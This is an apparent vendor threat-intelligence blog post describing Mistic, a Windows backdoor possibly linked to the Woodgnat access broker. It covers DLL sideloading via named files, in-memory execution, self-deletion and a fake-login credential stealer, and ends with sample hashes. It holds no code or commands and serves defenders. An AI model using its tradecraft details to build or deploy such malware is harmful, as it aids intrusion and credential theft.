Insights, news, education and announcements from PolySwarm

Mistic: New Malware May Signal Evolution in Access Broker Tooling

Written by The Hivemind | Jun 29, 2026 7:02:43 PM

Verticals Targeted: Insurance, Education, Information Technology
Related Families: Mistic, ModeloRAT

Executive Summary

Mistic is a newly identified Windows backdoor observed in cybercrime intrusions since April 2026 that may be linked to the financially motivated initial access broker Woodgnat (aka KongTuke). Industry researchers observed Mistic deployed alongside ModeloRAT in at least one intrusion, providing a potential connection between the malware and an actor previously linked to ransomware operations including Qilin, Interlock, Rhysida, Akira, 8Base, and Black Basta. Mistic emphasizes stealth through in-memory code execution, DLL sideloading, and self-deletion capabilities, potentially enabling long-term access while minimizing forensic visibility.

Key Takeaways

  • Mistic is a newly observed Windows backdoor, active since April 2026 and potentially linked to the Woodgnat initial access broker ecosystem.
  • Mistic can execute operator-supplied code directly in memory without writing those payloads to disk and includes a built-in kill switch capable of deleting the malware from compromised systems.
  • The backdoor is delivered through DLL sideloading using legitimate software components, allowing malicious activity to blend into trusted processes and environments.
  • Researchers observed Mistic operating alongside ModeloRAT, a remote access trojan previously associated with ransomware deployment activity.
  • A credential-stealing .NET component displaying a fake login screen was observed alongside Mistic activity, indicating an interest in credential collection in addition to persistent access.
  • The activity targeted organizations across multiple sectors, including insurance, education, and information technology, suggesting opportunistic victim selection consistent with an initial access broker business model.

Background

Available evidence suggests Mistic is designed to provide durable, low-visibility access within enterprise environments. Its reliance on in-memory code execution, trusted-process sideloading, and self-deletion functionality indicates an emphasis on stealth and long-term persistence rather than immediate disruptive activity. While attribution remains low confidence, the observed proximity between Mistic and ModeloRAT activity, combined with separate reporting that Mistic may be delivered through ClickFix infection chains previously associated with Woodgnat operations, warrants continued monitoring of potential links between the malware and the broader Woodgnat ecosystem. Symantec and Carbon Black reported on this activity.

Activity Overview

Symantec researchers first observed Mistic in April 2026 during investigations involving organizations in the insurance, education, information technology, and professional services sectors. The malware was previously documented by Zscaler under the name MLTBackdoor and has since appeared in multiple cybercrime intrusions. Researchers noted that Mistic was deployed alongside ModeloRAT in at least one incident, creating a possible association with the financially motivated initial access broker tracked as Woodgnat.

The malware is deployed through a DLL sideloading chain involving the legitimate executable MpExtMs.exe. A malicious loader hooks Windows API functions responsible for library loading and path resolution, ultimately forcing the execution of a malicious DLL named EndpointDlp.dll. The DLL name resembles legitimate Microsoft endpoint security components, potentially helping the malware blend into trusted enterprise software environments and evade casual scrutiny.

Mistic supports a range of traditional backdoor functions including file upload and download operations, file and directory management, command polling interval modification, and remote code execution. Its most notable capability is the ability to execute operator-supplied code directly in memory without saving payloads to disk. The malware also includes a kill switch that allows operators to terminate and delete the malware, reducing forensic artifacts and complicating post-incident investigations.

Researchers also observed a .NET credential-stealing component deployed alongside Mistic that presents a fake login screen to harvest credentials from victims. Additional tools observed during the intrusion included PowerShell, WMIC, curl, certutil, net.exe, and reg.exe, demonstrating continued reliance on legitimate administrative utilities alongside custom malware.

Who is Woodgnat?

Woodgnat, also publicly tracked as KongTuke, is a financially motivated cybercrime operation active since at least May 2024. The group is primarily assessed to function as an initial access broker, establishing access within victim environments and subsequently selling that access to other threat actors, including ransomware affiliates. Public reporting has linked Woodgnat activity to ransomware operations involving Qilin, Interlock, Rhysida, Akira, 8Base, and Black Basta.

Woodgnat is known for abusing compromised WordPress infrastructure to deliver evolving social-engineering campaigns including ClickFix, FileFix, and CrashFix techniques. These campaigns ultimately persuade victims to execute attacker-supplied PowerShell commands that facilitate deployment of additional tooling, including ModeloRAT. The group's targeting appears largely opportunistic, reflecting its role as an access broker rather than a sector-focused threat actor.

Analyst Commentary

Mistic reflects a broader trend toward custom malware development within cybercriminal ecosystems associated with ransomware access operations. Rather than relying exclusively on commodity remote access tools and living-off-the-land techniques, threat actors increasingly appear willing to invest in purpose-built malware that improves stealth, resilience, and operational flexibility. Mistic's emphasis on memory-resident execution, trusted-process sideloading, and self-removal functionality highlights the growing importance of behavioral detection, threat hunting, and memory-focused analysis capabilities that extend beyond traditional signature-based security controls.

As new malware families emerge, defenders often face a visibility gap before signatures and intelligence reporting become widely available. PolySwarm can help close that gap by providing access to crowdsourced malware intelligence, multi-engine analysis, related sample discovery, and infrastructure correlations that support faster identification and investigation of emerging threats before they become broadly understood by the security community.

IOCs

PolySwarm has multiple samples associated with this activity.

 

1e41c7bfaa6aa3b93b6cc024274a10e33f3e12fe7c98c1db387ef8927f9d1984

3f797a639bc855bc6d5471f327924b62d10900ddec49b970eca6604142bbb4be

afd5f1ed45a9867daf3bc64152cef460a06b164c8183e490db39146d4749a82c

db972979d508e75fe730d3b72c2701470fbdaeaf8ebdd674744754fa44438ca5

fb3630822b70bacb56aa4cec29b5a0e3e9acb3920809e70310a4003385a6d34a

59e3c4cb06331b4f2d78a9a0592f3747e573bd01c5a7650c26361d1e25520712

8c935feec4bd05d5d918df308be417532fb42608fb989a08eab183e0ae699235

 

Click here to view all samples of Mistic in our PolySwarm portal.

 

Don’t have a PolySwarm account? Go here to sign up for a free Community plan or subscribe.

Contact us at hivemind@polyswarm.io | Check out our blog | Subscribe to our reports.

 
View full post